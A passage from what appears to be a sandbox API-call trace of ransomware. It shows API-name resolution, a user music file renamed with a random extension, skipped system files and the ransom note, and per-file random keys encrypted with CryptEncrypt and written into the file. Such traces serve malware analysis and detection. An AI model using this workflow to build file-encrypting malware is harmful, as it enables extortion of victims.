lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.882] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.882] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.882] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.882] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.882] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.882] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.882] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.882] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.882] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.882] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.882] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.882] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.882] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.882] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.882] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.882] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.882] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.882] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.883] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.883] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.883] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.883] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.883] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.883] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.883] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.883] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.883] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.883] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.883] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.883] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.883] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.883] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.883] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.883] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.883] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.883] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.883] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.884] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.884] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.884] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.884] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.884] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.884] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.884] lstrlenA (lpString="DELETEATOM") returned 10 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.884] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.884] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.884] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.884] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.884] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.884] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.884] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.884] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.884] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.884] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.884] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.884] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.884] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.885] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.885] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.885] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.885] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.885] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.885] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.885] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.885] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.885] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.885] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.885] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.885] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.885] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.885] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.885] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.885] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.885] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.885] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.885] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.885] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.886] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.886] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.886] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.886] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.886] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.886] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.886] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.886] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.886] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.886] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.886] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.886] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3") returned 69 [0085.886] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3.sIe3v") returned 75 [0085.886] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ujdl.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3.sIe3v" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ujdl.mp3.sie3v"), dwFlags=0x0) returned 1 [0085.887] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.887] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.887] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.888] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc4ebb0, ftCreationTime.dwHighDateTime=0x1d4cf11, ftLastAccessTime.dwLowDateTime=0xaa07fbc0, ftLastAccessTime.dwHighDateTime=0x1d4d27a, ftLastWriteTime.dwLowDateTime=0xaa07fbc0, ftLastWriteTime.dwHighDateTime=0x1d4d27a, nFileSizeHigh=0x0, nFileSizeLow=0x6ceb, dwReserved0=0x0, dwReserved1=0x0, cFileName="UJdL.mp3", cAlternateFileName="")) returned 0 [0085.888] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0085.888] CloseHandle (hObject=0x428) returned 1 [0085.888] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43c9e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.888] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.888] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ee0d80, ftCreationTime.dwHighDateTime=0x1d4cb82, ftLastAccessTime.dwLowDateTime=0xf3552d40, ftLastAccessTime.dwHighDateTime=0x1d4cb43, ftLastWriteTime.dwLowDateTime=0xf3552d40, ftLastWriteTime.dwHighDateTime=0x1d4cb43, nFileSizeHigh=0x0, nFileSizeLow=0x11a04, dwReserved0=0x0, dwReserved1=0x0, cFileName="jars3vHzEL-kaB8.mp3", cAlternateFileName="JARS3V~1.MP3")) returned 1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="autorun.inf") returned 1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="boot.ini") returned 1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="desktop.ini") returned 1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="ntuser.dat") returned -1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="iconcache.db") returned 1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="bootsect.bak") returned 1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="ntuser.dat.log") returned -1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="thumbs.db") returned -1 [0085.888] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3", lpString2="Bootfont.bin") returned 1 [0085.888] lstrlenW (lpString="jars3vHzEL-kaB8.mp3") returned 19 [0085.888] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.888] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.888] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.888] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.888] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0085.888] lstrlenW (lpString="jars3vHzEL-kaB8.mp3") returned 19 [0085.888] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0085.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="jars3vHzEL-kaB8.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3" [0085.888] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\jars3vhzel-kab8.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.889] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=72196) returned 1 [0085.889] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.889] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.889] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.889] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.889] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.890] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.890] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.892] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.892] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.893] CloseHandle (hObject=0x42c) returned 1 [0085.893] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.893] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.894] CloseHandle (hObject=0x0) returned 0 [0085.894] CloseHandle (hObject=0x428) returned 1 [0085.894] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.894] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.895] GetTickCount () returned 0x114dedb [0085.895] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.895] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.895] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.895] VirtualAlloc 